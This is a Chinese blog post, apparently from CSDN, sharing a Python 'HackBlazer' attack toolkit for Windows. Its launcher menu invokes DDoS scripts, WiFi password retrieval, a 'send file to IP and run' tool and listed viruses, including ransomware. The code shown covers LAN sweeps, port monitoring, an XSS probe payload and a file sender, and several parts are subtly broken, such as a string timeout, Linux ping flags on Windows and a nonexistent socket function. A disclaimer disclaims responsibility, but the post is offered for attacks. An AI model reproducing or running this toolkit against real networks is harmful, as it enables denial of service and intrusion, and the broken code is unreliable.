0


HackBlazer 纯python3.11.9免费开源攻击脚本Windows版

这套免费开源的纯python3.11.9攻击脚本是我从2023的8月份写到2024的11月份,时间有点短但是里面的项目是真的能够进行脚本攻击的,本人保证能够成功运行(注意:使用该脚本仅限于Windows系统,其他系统可能有些脚本不支持!)
然后呢就是该项目更新问题,我会一直更新!直到2028年,这个开源项目我才会终止对它的更新与维护。

virus的话呢可以在 HackBlazer---virus python3.11.9版本-CSDN博客 中复制

注意!!!:

  1. 本开源项目不可传出其他平台!
  2. 本开源项目仅供参考,切记不可用于任何非法用途!!!
  3. 出事了我不担责的哈(一定要看!!!)
    出事了我不担责的哈(一定要看!!!)
    出事了我不担责的哈(一定要看!!!)

那么现在开始你的复制和粘贴吧

1.主程序

这个是主程序,是用来调用其他脚本程序的
这个是"hackblazerM",一定要这样命名,不然用不了,后面自己加后缀!

  1. import time
  2. import subprocess
  3. import platform
  4. import sys
  5. import os
  6. import tkinter as tk
  7. os.system('cls' if os.name == 'nt' else 'clear')
  8. front_loaded_suffixPY = input("suffix <<")
  9. if front_loaded_suffixPY == "":
  10. front_loaded_suffixPY = ".py"
  11. suffixPY = front_loaded_suffixPY
  12. print(f"以默认后缀名为 {suffixPY} !")
  13. print(f"后缀为{front_loaded_suffixPY}")
  14. time.sleep(0.5)
  15. print("正在检查 DigitalTrailBlazer-hackblazer协议 是否异常")
  16. time.sleep(0.5)
  17. file_path2 = ("DigitalTrailBlazer-hackblazer协议" + front_loaded_suffixPY)
  18. if os.path.exists(file_path2):
  19. print("正常")
  20. else:
  21. print("异常")
  22. sys.exit()
  23. time.sleep(0.5)
  24. def on_mousewheel(event):
  25. # 根据鼠标滚轮方向滚动文本框的视图
  26. text_widget.yview_scroll(int(-1 * (event.delta / 120)), "units")
  27. def agree():
  28. root.destroy()
  29. def decline():
  30. print("已为您退出该程序")
  31. os.system('cls' if os.name == 'nt' else 'clear')
  32. root.destroy()
  33. sys.exit()
  34. root = tk.Tk()
  35. root.title("协议")
  36. root.geometry("800x500")
  37. # 用于标记用户是否已经做出选择的变量
  38. choice_made = False
  39. def enable_program_continue():
  40. global choice_made
  41. choice_made = True
  42. text_widget = tk.Text(root)
  43. text_widget.pack(fill=tk.BOTH, expand=True)
  44. text_widget.insert(tk.END, "<DigitalTrailBlazer>\n")
  45. text_widget.insert(tk.END, """
  46. HackBlazer免责声明
  47. 用户在使用本软件前应仔细阅读本免责声明,继续使用表示用户接受所有条款。
  48. 本软件的使用受限于用户已获得合法授权,开发者不对用户授权的合法性进行审查,用户自行对因授权问题导致的法律后果负责。
  49. 本软件可能存在未知漏洞或错误,尽管开发者尽力改进,但对于因这些问题导致的用户数据丢失、系统损坏或其他不良后果,开发者不承担责任。
  50. 用户不得将本软件用于任何非法目的,如网络犯罪、恶意攻击、未经授权的系统入侵等,否则将依法承担全部责任。
  51. 本软件仅供合法的安全测试、网络研究、企业内部安全评估等授权场景使用,未经授权用于其他目的属于用户违规行为。
  52. 在使用本软件进行操作时,用户应采取合理措施防止对目标系统造成损害,因用户疏忽造成的损失由用户自行承担。
  53. 对于因不可抗力(如自然灾害、战争、政府行为、网络故障等超出开发者控制范围的情况)导致的软件问题或用户损失,开发者不承担责任。
  54. 本软件的使用许可仅授予用户个人或特定授权实体,未经许可不得分发、共享、出租、出售本软件,否则用户承担侵权责任。
  55. 用户不得利用本软件对政府机构、军事设施、关键基础设施(能源、通信、金融等)进行未经授权的访问或攻击,否则自行承担法律后果。
  56. 本软件不保证与所有的操作系统、硬件设备或其他软件完全兼容,因兼容性问题导致的问题,开发者不承担责任。
  57. 用户使用本软件产生的任何直接或间接损失,包括但不限于经济损失、数据损失、业务中断等,开发者不承担赔偿责任。
  58. 开发者不承担因用户使用本软件对第三方造成损害而引发的任何责任,包括但不限于第三方索赔、诉讼等。
  59. 用户不得使用本软件收集、存储或传播违反隐私法规的个人信息,若有违反,用户承担责任。
  60. 若用户修改本软件或创建衍生作品且未获得开发者书面同意,将承担知识产权相关法律责任。
  61. 本软件仅作为一种工具提供,用户应对其使用行为和相关决策负责,开发者不对用户的决策失误承担责任。
  62. 用户不得使用本软件干扰或破坏其他软件、网络服务的正常运行,如有违反,自行承担后果。
  63. 对于因软件更新、升级或停用导致的用户不便或损失,开发者不承担责任,用户应自行备份数据。
  64. 用户在使用本软件过程中若遇到技术问题,开发者可提供有限支持,但不保证问题一定能解决。
  65. 本软件中的任何信息、数据或功能仅作为参考,用户不应完全依赖,因依赖产生的问题开发者不负责。
  66. 开发者不承担因用户在软件使用过程中违反道德准则或行业规范而产生的任何后果。
  67. 本软件可能会受到网络环境的影响,如网络延迟、丢包等,开发者不对由此产生的问题负责。
  68. 用户不得使用本软件对教育机构、医疗机构、公益组织等特殊保护对象进行未经授权的渗透测试。
  69. 若用户利用本软件进行商业间谍活动、不正当竞争等违法商业行为,将依法承担责任。
  70. 本软件的知识产权归开发者所有,用户不得删除、掩盖或篡改软件中的知识产权标识。
  71. 用户不得使用本软件故意制造虚假信息、误导用户或进行欺诈活动,否则承担法律责任。
  72. 在使用本软件进行渗透测试等操作时,应遵守相关的安全标准和规范,因违反导致的问题用户负责。
  73. 开发者有权根据法律法规、技术发展等情况对软件进行修改或终止服务,用户应接受。
  74. """)
  75. # 绑定鼠标滚轮事件
  76. text_widget.bind("<MouseWheel>", on_mousewheel)
  77. agree_button = tk.Button(root, text="我同意", command=lambda: [agree(), enable_program_continue()])
  78. agree_button.pack(pady=20)
  79. decline_button = tk.Button(root, text="我拒绝", command=lambda: [decline(), enable_program_continue()])
  80. decline_button.pack()
  81. # 主循环,等待用户做出选择
  82. while not choice_made:
  83. root.update()
  84. os.system('cls' if os.name == 'nt' else 'clear')
  85. print("您已同意本协议")
  86. print("""
  87. ---------------------------------------------------------------------------------------
  88. """)
  89. print("此程序由 DigitalTrailBlazer 团队提供技术支持")
  90. time.sleep(1)
  91. print("""
  92. <DigitalTrailBlazer>
  93. ======================
  94. 此程序仅供教学
  95. 切勿用于任何非法活动
  96. ======================
  97. """)
  98. time.sleep(0.5)
  99. system_name = platform.system()
  100. if system_name != "Windows":
  101. print("当前系统不是Windows系统")
  102. else:
  103. print("当前使用的系统为Windows系统")
  104. time.sleep(0.5)
  105. versionnumber = "computer client side [1.1.3] - Chinese"
  106. print(f"您使用的版本为 <DigitalTrailBlazer> HackBlazer - [{versionnumber}]")
  107. time.sleep(0.5)
  108. while True:
  109. try:
  110. program = input("<DigitalTrailBlazer>HackBlazer <<")
  111. if program == "check -m -l":#查看指定的库是否下载
  112. subprocess.call(["python","查看指定的库是否下载" + suffixPY])
  113. if program == "check -all -v":#查看所有内置病毒
  114. subprocess.call(["python","查看所有内置病毒" + suffixPY])
  115. if program == "check -wifi key":#查找wifi的密码
  116. subprocess.call(["python","csdn-查找wifi的密码" + suffixPY])
  117. if program == "check -m -web":#查找网段
  118. subprocess.call(["python","查找网段" + suffixPY])
  119. if program == "open cal":#打开计算机
  120. subprocess.call(["python","打开计算机" + suffixPY])
  121. if program == "find -r -ip":#查找真实ip
  122. subprocess.call(["python","查找真实ip" + suffixPY])
  123. if program == "use -ddos/1":#启用DDoS攻击 1
  124. subprocess.call(["python","DDoS攻击 第1版" + suffixPY])
  125. if program == "find -vul -ip":#查找指定ip的漏洞
  126. subprocess.call(["python","查找指定ip的漏洞" + suffixPY])
  127. if program == "check -m -ip":#查找我的ip
  128. subprocess.call(["python","查找我的ip" + suffixPY])
  129. if program == "use -ddos/2":#启用DDoS攻击 2
  130. subprocess.call(["python3","DDoS攻击 第2版" + suffixPY])
  131. if program == "check -internet card":#查看当前网卡
  132. subprocess.call(["python3","查看当前网卡" + suffixPY])
  133. if program == "req -web code":#爬取网页源代码
  134. subprocess.call(["python3","爬取网页源代码" + suffixPY])
  135. if program == "check -web":#查看指定网站的状态
  136. subprocess.call(["python","查看指定网站的状态" + suffixPY])
  137. if program == "use -ddos-1":#启用GHDDoS攻击
  138. subprocess.call(["python","GH-DDoS攻击" + suffixPY])
  139. if program == "web tools":#启用GH的网络工具
  140. subprocess.call(["python","GH-网络工具" + suffixPY])
  141. if program == "listen -ip":#监听指定IP主机
  142. subprocess.call(["python","监听ip主机" + suffixPY])
  143. if program == "open game1":#启动内置小游戏---1
  144. subprocess.call(["python","game1" + suffixPY])
  145. if program == "use -ddos/3":#启用DDoS攻击 3
  146. subprocess.call(["python","DDoS攻击 第3版" + suffixPY])
  147. if program == "send file -ip host [run]":#向指定ip主机发送文件并运行
  148. subprocess.call(["python","发送指定文件至指定IP并运行" + suffixPY])
  149. if program == "scan -n -wifi/2":#扫描附近wifi 2
  150. subprocess.call(["python","扫描附近wifi第2版" + suffixPY])
  151. if program == "scan -n -wifi/3":#扫描附近wifi 3
  152. subprocess.call(["python","扫描附近wifi第3版" + suffixPY])
  153. if program == "help":#查看HackBlazer的所有代码
  154. subprocess.call(["python","帮助" + suffixPY])
  155. if program == "scan -m -lan":#扫描局域网和局域网内部活跃IP
  156. subprocess.call(["python","扫描局域网和局域网内部活跃IP" + suffixPY])
  157. if program == "req -web ip":#爬取网站的IP
  158. subprocess.call(["python","爬取网站IP" + suffixPY])
  159. if program == "use -ddos-2":#启用GHDDoS攻击
  160. subprocess.call(["python","GH-DDos" + suffixPY])
  161. if program == "use -new cmd":#使用新的cmd终端
  162. subprocess.call(["python","HBuse2" + suffixPY])
  163. target_strings3 = ["cls", "clear", "clear screen", "cls screen"]
  164. if program in target_strings3:#清屏
  165. os.system('cls' if os.name == 'nt' else 'clear')
  166. target_strings4 = ["hackblazer -version","hb -version","HackBlazer -version","HB -version","hackblazer version","hb version","HackBlazer version","HB version","version","vs","VS","VerSion","VERSION"]
  167. if program in target_strings4:#查看版本
  168. print(f"您使用的版本为 <CipherBreakers> HackBlazer - computer client side[{versionnumber}] - 中文版")
  169. if program == "rep -video":#爬取视频
  170. subprocess.call(["python","爬取视频" + suffixPY])
  171. if program == "exit()":#退出
  172. print("已为您退出该程序")
  173. os.system('cls' if os.name == 'nt' else 'clear')
  174. sys.exit()
  175. except Exception as e:
  176. print(f"发生错误:{e}")

2.帮助

这个是"帮助",一定要这样命名,不然用不了,后面自己加后缀!

  1. print("<CipherBreakers>")
  2. print("""
  3. python标准库:
  4. ============================================================
  5. "check -m -l":#查看指定的库是否下载
  6. "check -all -v":#查看所有内置病毒
  7. "open cal":#打开计算机
  8. "find -r -ip":#查找真实ip
  9. "check -m -web":#查找网段
  10. "check -m -ip":#查找我的ip
  11. "use -ddos/1":#启用DDoS攻击 第1版
  12. "use -ddos/2":#启用DDoS攻击 第2版
  13. "use -ddos/3":#启用DDoS攻击 第3版
  14. "use -ddos-1"#启用GH的DDoS攻击1
  15. "web tools"#启用GH的网络工具
  16. "use -ddos-2"#启用GH的DDoS攻击2
  17. "listen -ip":#监听指定IP主机
  18. "open game1":#启动内置小游戏---1
  19. "scan -n -wifi/2":#扫描附近wifi 第2版
  20. "scan -n -wifi/3":#扫描附近wifi 第3版
  21. "scan -m -lan":#扫描局域网和局域网内部活跃IP
  22. "send file -ip host [run]":#向指定ip主机发送文件并运行
  23. "use -new cmd":#使用新的cmd终端
  24. "cls", "clear", "clear screen", "cls screen"#清屏
  25. "help":#查看HackBlazer的所有代码
  26. "exit":#退出
  27. ============================================================
  28. 第三方库:
  29. ============================================================
  30. "rep -video":#爬取视频
  31. "scan -n -ssid[wifi]":#扫描附近wifi
  32. "check -wifi key/csdn":#查找wifi的密码
  33. "find -vul -ip":#查找指定ip的漏洞
  34. "check -internet card":#查看当前网卡
  35. "req -web code":#爬取网页源代码
  36. "check -web":#查看指定网站的状态
  37. "req -web ip":#爬取网站的IP
  38. ============================================================
  39. ------------------------------------------------------------
  40. GitHub创作者:
  41. ============================================================
  42. "use -ddos-1"#启用GH的DDoS攻击1
  43. "web tools"#启用GH的网络工具
  44. "use -ddos-2"#启用GH的DDoS攻击2
  45. ============================================================
  46. ------------------------------------------------------------
  47. CSDN创作者:
  48. ============================================================
  49. "check -wifi key":#查找wifi的密码
  50. ============================================================
  51. """)

3.查看当前局域网和局域网内活跃IP

这个是"查看当前局域网和局域网内活跃IP",一定要这样命名,不然用不了,后面自己加后缀!

  1. import socket
  2. import ipaddress
  3. import subprocess
  4. print("<DigitalTrailBlazer>")
  5. def get_local_ip():
  6. """获取本机的局域网IP地址"""
  7. try:
  8. # 创建一个UDP套接字
  9. sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
  10. # 连接到公共DNS服务器
  11. sock.connect(('8.8.8.8', 80))
  12. # 获取本地IP地址
  13. local_ip = sock.getsockname()[0]
  14. sock.close()
  15. return local_ip
  16. except Exception as e:
  17. print(f"获取本地IP地址时出错: {e}")
  18. return None
  19. def scan_network(network):
  20. """扫描指定网络中的活跃IP地址"""
  21. active_ips = []
  22. try:
  23. # 创建一个IP网络对象
  24. net = ipaddress.ip_network(network, strict=False)
  25. for ip in net.hosts():
  26. try:
  27. # 使用ping命令检查IP是否活跃
  28. response = subprocess.run(['ping', '-c', '1', str(ip)], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
  29. if response.returncode == 0:
  30. active_ips.append(str(ip))
  31. except Exception as e:
  32. print(f"扫描IP {ip} 时出错: {e}")
  33. except ValueError as e:
  34. print(f"网络地址格式错误: {e}")
  35. return active_ips
  36. if __name__ == "__main__":
  37. local_ip = get_local_ip()
  38. if local_ip:
  39. print(f"本机局域网IP地址: {local_ip}")
  40. # 假设本机IP在192.168.1.x网段
  41. network = f"{local_ip.split('.')[0]}.{local_ip.split('.')[1]}.0.0/24"
  42. print(f"正在扫描网络: {network}")
  43. active_ips = scan_network(network)
  44. if active_ips:
  45. print("活跃的IP地址:")
  46. for ip in active_ips:
  47. print(ip)
  48. else:
  49. print("未发现活跃的IP地址。")
  50. else:
  51. print("无法获取本机局域网IP地址。")

4.查看当前网卡

这个是"查看当前网卡",一定要这样命名,不然用不了,后面自己加后缀!

  1. import psutil
  2. print("<DigitalTrailBlazer>")
  3. def view_network_cards():
  4. interfaces = psutil.net_if_addrs()
  5. for interface_name, interface_addresses in interfaces.items():
  6. print("网卡名称:", interface_name)
  7. for address in interface_addresses:
  8. print(" 地址类型:", address.family.name)
  9. print(" 地址:", address.address)
  10. print(" 网络掩码:", address.netmask)
  11. print(" 广播地址:", address.broadcast)
  12. if __name__ == "__main__":
  13. view_network_cards()

5.查看所有内置病毒

这个是"查看所有内置病毒",一定要这样命名,不然用不了,后面自己加后缀!
想要同款病毒可以到我主页复制 HackBlazer---virus python3.11.9版本-CSDN博客

  1. print("DigitalTrailBlazer")
  2. print("virus1 ------ 一个很难关掉的窗口")
  3. print("virus2 ------ 恶心的勒索程序")

6.查看指定的库是否下载

这个是"查看指定的库是否下载",一定要这样命名,不然用不了,后面自己加后缀!

  1. import importlib
  2. print("<DigitalTrailBlazer>")
  3. def check_library_installed(library_name):
  4. try:
  5. importlib.import_module(library_name)
  6. return True
  7. except ImportError:
  8. return False
  9. library_to_check = input("library <<")
  10. if check_library_installed(library_to_check):
  11. print(f"{library_to_check} 已安装。")
  12. else:
  13. print(f"{library_to_check} 未安装。")

7.查看指定网站的状态

这个是"查看指定网站的状态",一定要这样命名,不然用不了,后面自己加后缀!

  1. import requests
  2. print("<DigitalTrailBlazer>")
  3. def check_website_status(url):
  4. try:
  5. response = requests.get(url)
  6. print(f"网站状态码: {response.status_code}")
  7. if response.status_code == 200:
  8. print("网站可以正常访问")
  9. elif response.status_code == 404:
  10. print("页面未找到")
  11. elif response.status_code == 500:
  12. print("服务器内部错误")
  13. else:
  14. print("其他状态码")
  15. except requests.RequestException as e:
  16. print(f"访问网站出错: {e}")
  17. if __name__ == "__main__":
  18. url = input("请输入网站地址: ")
  19. check_website_status(url)

8.查看网段

这个是"查找网段",一定要这样命名,不然用不了,后面自己加后缀!

  1. import socket
  2. import threading
  3. print("<DigitalTrailBlazer>")
  4. def get_local_network_segment():
  5. try:
  6. s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
  7. s.connect(("8.8.8.8", 80))
  8. ip = s.getsockname()[0]
  9. subnet_mask = None
  10. interfaces = socket.if_nameindex()
  11. for interface_name, interface_index in interfaces:
  12. if interface_name.startswith('Ethernet') or interface_name.startswith('Wi-Fi'):
  13. interface_info = socket.if_addresses(interface_index)
  14. for info in interface_info:
  15. if info[0] == socket.AF_INET:
  16. subnet_mask = info[2][0]
  17. break
  18. if subnet_mask:
  19. break
  20. if subnet_mask is None:
  21. return None
  22. ip_parts = [int(x) for x in ip.split('.')]
  23. mask_parts = [int(x) for x in subnet_mask.split('.')]
  24. network_parts = [ip_parts[i] & mask_parts[i] for i in range(4)]
  25. return '.'.join(map(str, network_parts)) + '/24'
  26. except Exception as e:
  27. return None
  28. def scan_local_network(network_segment):
  29. found_devices = []
  30. def scan_ip(ip):
  31. try:
  32. hostname, _, _ = socket.gethostbyaddr(ip)
  33. found_devices.append((ip, hostname))
  34. except socket.herror:
  35. pass
  36. threads = []
  37. for i in range(1, 255):
  38. ip = f"{network_segment[:-3]}{i}"
  39. t = threading.Thread(target=scan_ip, args=(ip,))
  40. t.start()
  41. threads.append(t)
  42. for t in threads:
  43. t.join()
  44. return found_devices
  45. if __name__ == "__main__":
  46. segment = get_local_network_segment()
  47. if segment:
  48. print(f"本地局域网网段为:{segment}")
  49. devices = scan_local_network(segment)
  50. for ip, name in devices:
  51. print(f"IP: {ip}, Name: {name}")
  52. else:
  53. print("无法确定本地局域网网段。")

9.查找我的ip

这个是"查找我的ip",一定要这样命名,不然用不了,后面自己加后缀!

  1. import socket
  2. print("<DigitalTrailBlazer>")
  3. def get_local_ip():
  4. try:
  5. s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
  6. s.connect(("8.8.8.8", 80))
  7. local_ip = s.getsockname()[0]
  8. s.close()
  9. return local_ip
  10. except Exception as e:
  11. print(f"获取本机IP地址时出错: {e}")
  12. return None
  13. if __name__ == "__main__":
  14. local_ip = get_local_ip()
  15. if local_ip:
  16. print(f"本机IP地址是: {local_ip}")

10.查找真实ip

这个是"查找真实ip",一定要这样命名,不然用不了,后面自己加后缀!

  1. import socket
  2. print("<DigitalTrailBlazer>")
  3. def get_canonical_ip(ip):
  4. try:
  5. # 尝试解析 IP 地址,如果成功则返回输入的 IP,因为它已经是正式 IP
  6. socket.inet_aton(ip)
  7. return ip
  8. except socket.error:
  9. try:
  10. # 如果输入不是正式 IP,则尝试通过域名解析获取正式 IP
  11. canonical_name = socket.gethostbyname(ip)
  12. return canonical_name
  13. except socket.gaierror:
  14. return "无法确定有效的 IP 地址"
  15. ip = input("请输入 IP 地址或域名:")
  16. print("真实IP为: ",get_canonical_ip(ip))
  17. print(get_canonical_ip(ip))

11.查找指定ip的漏洞

这个是"查找指定ip的漏洞",一定要这样命名,不然用不了,后面自己加后缀!

  1. import requests
  2. from bs4 import BeautifulSoup
  3. print("<DigitalTrailBlazer>")
  4. # 设置请求超时时间(秒)
  5. REQUEST_TIMEOUT = 8
  6. def detect_xss_vulnerability(url):
  7. try:
  8. payload = "<script>alert('XSS');</script>"
  9. response = requests.get(url, params={'input': payload}, timeout=REQUEST_TIMEOUT)
  10. soup = BeautifulSoup(response.text, 'html.parser')
  11. if payload in soup.prettify():
  12. print(f"在 {url} 检测到跨站脚本漏洞(XSS)")
  13. return True
  14. print(f"在 {url} 未检测到跨站脚本漏洞(XSS)")
  15. return False
  16. except requests.exceptions.RequestException as e:
  17. print(f"检测XSS漏洞时出错: {e}")
  18. return False
  19. def check_for_missing_elements(url):
  20. try:
  21. response = requests.get(url, timeout=REQUEST_TIMEOUT)
  22. response.raise_for_status()
  23. soup = BeautifulSoup(response.text, 'html.parser')
  24. # 这里假设检测是否存在某个关键的 <meta> 元素,比如用于设置字符编码的
  25. meta_encoding_element = soup.find('meta', {'charset': True})
  26. if not meta_encoding_element:
  27. print(f"在 {url} 可能存在潜在漏洞,未检测到关键的 <meta> 元素(用于设置字符编码)。")
  28. return True
  29. print(f"在 {url} 未发现因关键 <meta> 元素缺失导致的潜在漏洞。")
  30. return False
  31. except requests.exceptions.RequestException as e:
  32. print(f"检查元素缺失漏洞时出错: {e}")
  33. return False
  34. if __name__ == "__main__":
  35. target_ip = input("ip <<")
  36. target_url = f"http://{target_ip}/" # 假设目标IP上有Web服务,这里是对应的URL
  37. detect_xss_vulnerability(target_url)
  38. check_for_missing_elements(target_url)

12.打开计算机

这个是"打开计算机",一定要这样命名,不然用不了,后面自己加后缀!

  1. import tkinter as tk
  2. print("<DigitalTrailBlazer>")
  3. def button_click(number):
  4. current = entry.get()
  5. entry.delete(0, tk.END)
  6. entry.insert(tk.END, current + str(number))
  7. def calculate():
  8. try:
  9. result = eval(entry.get())
  10. history_text.insert(tk.END, f"{entry.get()} = {result}\n")
  11. entry.delete(0, tk.END)
  12. entry.insert(tk.END, result)
  13. except Exception as e:
  14. entry.delete(0, tk.END)
  15. entry.insert(tk.END, "Error")
  16. def clear():
  17. entry.delete(0, tk.END)
  18. def add_negative_sign():
  19. current = entry.get()
  20. if current and (current[0].isdigit() or current[0] in "("):
  21. entry.insert(0, "-")
  22. def clear_history():
  23. history_text.delete(1.0, tk.END)
  24. root = tk.Tk()
  25. root.title("Simple Calculator")
  26. entry = tk.Entry(root, width=30)
  27. entry.grid(row=0, column=0, columnspan=4)
  28. buttons = [
  29. ('7', 1, 0), ('8', 1, 1), ('9', 1, 2), ('/', 1, 3),
  30. ('4', 2, 0), ('5', 2, 1), ('6', 2, 2), ('*', 2, 3),
  31. ('1', 3, 0), ('2', 3, 1), ('3', 3, 2), ('-', 3, 3),
  32. ('0', 4, 0), ('.', 4, 1), ('=', 4, 2), ('+', 4, 3),
  33. ('C', 5, 0), ('±', 5, 1), ('Clear History', 5, 2) # 添加清除历史记录按钮
  34. ]
  35. for label, row, col in buttons:
  36. if label == 'C':
  37. button = tk.Button(root, text=label, command=clear, width=10)
  38. elif label == '=':
  39. button = tk.Button(root, text=label, command=calculate, width=10)
  40. elif label == '±':
  41. button = tk.Button(root, text=label, command=add_negative_sign, width=10)
  42. elif label == 'Clear History':
  43. button = tk.Button(root, text=label, command=clear_history, width=15)
  44. else:
  45. button = tk.Button(root, text=label, command=lambda label=label: button_click(label), width=10)
  46. button.grid(row=row, column=col)
  47. history_text = tk.Text(root, height=5, width=30)
  48. history_text.grid(row=6, column=0, columnspan=4)
  49. root.mainloop()

13.发送指定文件至指定IP并运行

这个是"发送指定文件至指定IP并运行",一定要这样命名,不然用不了,后面自己加后缀!

  1. import socket
  2. import os
  3. print("DigitalTrailBlazer")
  4. timeout = input("请输入超时时间(秒) <<")
  5. def send_file_to_desktop(ip, port, file_path):
  6. try:
  7. # 创建socket对象
  8. sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  9. sock.settimeout(timeout) # 设置超时时间
  10. sock.connect((ip, port))
  11. # 发送文件内容
  12. with open(file_path, 'rb') as file:
  13. while True:
  14. data = file.read(1024)
  15. if not data:
  16. break
  17. sock.sendall(data)
  18. print(f"文件 {file_path} 已成功发送到 {ip}:{port}")
  19. except Exception as e:
  20. print(f"发送文件时出错: {e}")
  21. finally:
  22. sock.close()
  23. def check_ip_validity(ip):
  24. try:
  25. socket.inet_aton(ip)
  26. return True
  27. except socket.error:
  28. return False
  29. def check_port_validity(ip, port):
  30. try:
  31. sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  32. sock.settimeout(2)
  33. result = sock.connect_ex((ip, port))
  34. if result == 0:
  35. print(f"端口 {port} 在 {ip} 上是开放的")
  36. return True
  37. else:
  38. print(f"端口 {port} 在 {ip} 上未开放")
  39. return False
  40. except Exception as e:
  41. print(f"检查端口时出错: {e}")
  42. return False
  43. finally:
  44. sock.close()
  45. def main():
  46. while True:
  47. ip = input("请输入目标IP地址: ")
  48. if not check_ip_validity(ip):
  49. print("IP地址无效,请重新输入")
  50. continue
  51. port = input("请输入目标端口号: ")
  52. try:
  53. port = int(port)
  54. if port < 0 or port > 65535:
  55. raise ValueError
  56. except ValueError:
  57. print("端口号无效,请输入一个0到65535之间的整数")
  58. continue
  59. if not check_port_validity(ip, port):
  60. confirm = input("端口未开放,是否继续?(y/n): ")
  61. if confirm.lower() != 'y':
  62. print("程序已退出")
  63. return
  64. file_path = input("请输入要发送的文件路径: ")
  65. if not os.path.exists(file_path):
  66. print("文件不存在,请重新输入")
  67. continue
  68. send_file_to_desktop(ip, port, file_path)
  69. break
  70. if __name__ == "__main__":
  71. main()

14.监听ip主机

这个是"监听ip主机",一定要这样命名,不然用不了,后面自己加后缀!

  1. import socket
  2. import threading
  3. import tkinter as tk
  4. from tkinter import ttk
  5. import signal
  6. import time
  7. import sys
  8. print("<DigitalTrailBlazer>")
  9. # 检查单个端口是否开放
  10. def check_port(host, port):
  11. sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  12. sock.settimeout(1)
  13. try:
  14. result = sock.connect_ex((host, port))
  15. if result == 0:
  16. return True
  17. return False
  18. except Exception:
  19. return False
  20. finally:
  21. sock.close()
  22. # 监听单个主机的多个端口
  23. def monitor_host_ports(host, ports):
  24. results = []
  25. for port in ports:
  26. open_status = check_port(host, port)
  27. results.append((port, open_status))
  28. return results
  29. # 监听多个主机的多个端口
  30. def monitor_multiple_hosts_ports(hosts, ports):
  31. all_results = []
  32. for host in hosts:
  33. host_results = monitor_host_ports(host, ports)
  34. all_results.extend([(host, port, status) for port, status in host_results])
  35. return all_results
  36. # 更新GUI显示结果
  37. def update_gui(results):
  38. for row in treeview.get_children():
  39. treeview.delete(row)
  40. for result in results:
  41. if len(result) == 2:
  42. host, (port, status) = result
  43. treeview.insert("", "end", values=(host, port, status))
  44. elif len(result) == 3:
  45. host, port, status = result
  46. treeview.insert("", "end", values=(host, port, status))
  47. # 持续监听的函数
  48. def continuous_monitoring():
  49. global running
  50. while running:
  51. start_time = time.time()
  52. results = monitor_multiple_hosts_ports(hosts, ports)
  53. update_gui(results)
  54. end_time = time.time()
  55. elapsed_time = end_time - start_time
  56. # 如果更新时间小于5秒,等待剩余时间,以保证大致每5秒更新一次
  57. if elapsed_time < 5:
  58. time.sleep(5 - elapsed_time)
  59. # 定义处理Ctrl+C信号的函数,增强退出功能
  60. def handle_ctrl_c(signal, frame):
  61. print("接收到Ctrl+C,正在退出程序...")
  62. global running
  63. running = False
  64. global monitor_thread
  65. if monitor_thread.is_alive():
  66. monitor_thread.join(timeout=3) # 最多等待3秒让线程结束
  67. if monitor_thread.is_alive():
  68. print("监听线程未能及时停止,强制退出...")
  69. sys.exit(1) # 强制退出程序
  70. root.destroy()
  71. print("程序已成功退出。")
  72. # 创建GUI窗口
  73. root = tk.Tk()
  74. root.title("网络端口监听")
  75. # 获取用户输入的透明度值(0 - 1之间)
  76. try:
  77. alpha_value = float(input("请输入窗口透明度(0 - 1之间):"))
  78. if 0 <= alpha_value <= 1:
  79. root.attributes('-alpha', alpha_value)
  80. else:
  81. print("输入的透明度值不在有效范围内,使用默认值0.7。")
  82. root.attributes('-alpha', 0.7)
  83. except ValueError:
  84. print("输入无效,使用默认值0.7。")
  85. root.attributes('-alpha', 0.7)
  86. root.configure(bg='#333333')
  87. label = tk.Label(root, text="<DigitalTrailBlazer>")
  88. label.pack(pady=20)
  89. # 创建表格
  90. treeview = ttk.Treeview(root, columns=("主机", "端口", "状态"), show="headings")
  91. treeview.heading("主机", text="主机")
  92. treeview.heading("端口", text="端口")
  93. treeview.heading("状态", text="状态")
  94. treeview.pack()
  95. # 获取用户输入的主机和端口信息
  96. hosts_input = input("请输入要监听的主机,多个主机用逗号分隔: ")
  97. hosts = [host.strip() for host in hosts_input.split(',')]
  98. ports_input = input("请输入要监听的端口,多个端口用逗号分隔: ")
  99. ports = [int(port.strip()) for port in ports_input.split(',')]
  100. # 启动监听线程
  101. running = True
  102. monitor_thread = threading.Thread(target=continuous_monitoring)
  103. monitor_thread.start()
  104. # 注册Ctrl+C信号处理函数
  105. signal.signal(signal.SIGINT, handle_ctrl_c)
  106. root.mainloop()

15.爬取视频

这个是"爬取视频",一定要这样命名,不然用不了,后面自己加后缀!

  1. import tkinter as tk
  2. from tkinter import messagebox
  3. import requests
  4. from PIL import Image, ImageTk
  5. def create_main_window():
  6. root = tk.Tk()
  7. root.title("req video")
  8. root.geometry("600x300")
  9. label = tk.Label(root, text="<DigitalTrailBlazer>")
  10. label.pack(pady=10)
  11. # 创建输入框
  12. url_label_url = tk.Label(root, text="video url")
  13. url_label_url.pack(pady=5)
  14. url_entry1 = tk.Entry(root, width=50)
  15. url_entry1.pack(pady=10)
  16. # 创建按钮
  17. start_button = tk.Button(root, text="Start", command=lambda: start_crawling(url_entry1.get()))
  18. start_button.pack(pady=20)
  19. root.mainloop()
  20. def start_crawling(url):
  21. try:
  22. response = requests.get(url, stream=True) # 设置stream为True以分块获取数据,提高效率和节省内存
  23. response.raise_for_status()
  24. # 这里简单以获取视频的第一帧画面作为示意(不同视频格式获取首帧方式不同,此为简单模拟)
  25. first_frame_data = None
  26. for chunk in response.iter_content(chunk_size=1024):
  27. if first_frame_data is None:
  28. first_frame_data = chunk
  29. else:
  30. first_frame_data += chunk
  31. # 简单判断是否达到一定长度,认为获取到首帧,实际情况更复杂需根据视频格式解析判断
  32. if len(first_frame_data) > 1024 * 1024: # 示例阈值,可调整
  33. break
  34. # 使用PIL库打开获取到的数据(模拟为图片数据)
  35. image = Image.open(first_frame_data)
  36. photo = ImageTk.PhotoImage(image)
  37. # 创建新窗口显示视频的首帧画面(示意)
  38. new_window = tk.Toplevel()
  39. new_window.title("视频首帧画面")
  40. new_window.geometry("400x300")
  41. video_label = tk.Label(new_window, image=photo)
  42. video_label.image = photo # 避免图片被垃圾回收,需保持引用
